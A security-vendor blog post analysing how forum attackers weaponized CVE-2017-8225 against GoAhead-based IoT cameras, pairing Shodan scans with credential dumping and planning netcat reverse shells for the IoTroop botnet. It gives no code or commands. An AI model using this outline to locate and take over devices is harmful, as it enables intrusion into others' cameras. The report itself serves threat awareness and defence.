A Huge Wave of IoT Zombies Are Coming
Introduction
Evolution is an integral part when it comes to malware, as attackers need to be one step ahead of whitehats to evade detection. While IoT malware started with simple attacks based on weak passwords, malware has been continuously evolving and taking more strategic approaches, such as cross-platform exploits, to impact a larger number of devices.
The default password attack is almost near saturation, i.e. the devices which can be hacked easily via default passwords have already been hacked. Also, with the recent awareness of IoT threats, many organizations and consumers have started implementing stronger passwords, hence forcing attackers to take different routes for exploits. The IoT threat space recently expanded to include a new botnet called IoTroop which uses exploits instead of weak passwords to take over devices.
One attack vector used by IoTroop is CVE-2017–8225, an exploit related to custom GoAhead embedded servers used by many IoT camera manufacturers. In this blog, we discuss the “MDLC” aka Malware Development Life Cycle tracking how a POC is weaponized and used by various attackers who share information and resources.
Weaponized scripts integrated with Shodan
We observed the claim of an attacker that he has scripts related to a weaponized CVE-2017–8225 exploit along with screenshots of the script in action.
The attacker made two scripts available in forums. The first script uses a Shodan query to dump all IP addresses that are devices vulnerable to CVE-2017–8225 by using a known Shodan dork (GoAhead related).
Now once all vulnerable IPs are collected, the second script uses CVE-2017–8225 to dump credentials for these devices. This combination will help script kiddies to take control over a variety of IoT devices without worrying about two important questions: WHERE (to find devices, which can be hacked) and HOW (to hack these devices)
Netcat for the reverse shell
When a fellow attacker asked about the status of the botnet formed from this attack, the author replied by saying that he needs a VPS, with which he can use netcat. Once this is done, the botnet is “good to go”.
In the IoTroop compromised devices, we indeed observed the presence of a netcat command for the reverse shell. This is also consistent with the findings of Check Point, causing us to speculate that the thinking of this attacker and IoTroop author were in the same lines.
Attacker collaboration
However, there is a small catch in the script. For the setup to work, the attacker needs access to Shodan Premium. We noted the exploit author asking for Shodan credits, and claiming that if he can get access to Shodan Premium, he will set up a botnet for any purpose.
Soon we observed that a fellow attacker agreed to share his Shodan credentials with the attacker if it will help him form the botnet.
Here onwards this thread got silent. No questions asked, no updates.
The proof of concept for CVE-2017–8225 was already released by a security researcher. However, the weaponized version’s ease of use and integration with Shodan makes it much easier for script kiddies to get control of devices. The attacker had similar thoughts when someone blamed him for simply copying most of the code from the original POC.
We also observed claims of people using these scripts to add more IoT devices to their existing botnets.
Conclusion
While it is intriguing to find the exact group associated with the attacks, a bigger picture in IoT security (or any form of Cybersecurity) is that if there is a known way for successfully attacking a device, it’s just a matter of time before someone with bad intentions abuses it for their own purpose. A huge number of devices vulnerable via CVE-2017–8225 were simply visible in Shodan, just waiting to be attacked. Without any security or patch, they are now vulnerable to become part of the IoTroop botnet.
NewSky Security IoT Halo proactively provides detection for CVE-2017–8225 attack attempts.
Ankit Anubhav, Principal Researcher, NewSky Security (@newskysecurity)
